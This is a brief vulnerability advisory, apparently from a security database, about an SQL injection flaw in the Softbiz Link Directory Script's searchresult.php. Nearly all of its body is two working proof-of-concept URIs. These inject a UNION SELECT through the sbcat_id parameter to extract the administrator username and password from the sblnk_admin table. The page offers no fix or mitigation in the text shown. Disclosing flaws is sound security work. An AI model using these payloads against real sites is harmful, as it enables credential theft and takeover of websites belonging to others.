• info
• discussion
• exploit
• solution
• references

Softbiz Link Directory Script SEARCHRESULT.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

To find username:
http://www.example.com/searchresult.php?sbcat_id=999999%20union/**/select/**/0,username,2,3/**/from/**/sblnk_admin/*
To find password:
http://www.example.com/searchresult.php?sbcat_id=999999%20union/**/select/**/0,password,2,3/**/from/**/sblnk_admin/*